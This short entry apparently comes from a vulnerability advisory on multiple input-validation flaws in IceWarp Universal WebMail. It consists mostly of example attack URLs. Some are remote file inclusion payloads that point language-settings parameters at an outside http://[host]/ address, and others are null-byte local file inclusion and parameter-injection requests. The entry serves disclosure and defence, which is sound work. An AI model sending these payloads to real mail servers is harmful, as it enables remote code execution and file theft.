|
IceWarp Universal WebMail Multiple Input Validation Vulnerabilities
An exploit is not required. The following examples were provided: http://example.com:32000/accounts/inc/include.php?language=0&lang_settings[0][1]=http://[host]/ http://example.com:32000/admin/inc/include.php?language=0&lang_settings[0][1]=http://[host]/ http://example.com:32000/dir/include.html?lang=[file]%00 http://example.com:32000/mail/settings.html?id=[current_id]&Save_x=1&language=TEST http://example.com:32000/mail/index.html?id=[current_id]&lang_settings[TEST]=test;http://[host]/; http://example.com:32000/mail/index.html?/mail/index.html?default_layout=OUTLOOK2003&layout_settings[OUTLOOK2003]=test;[file]%00;2 |
|
|
Privacy Statement |
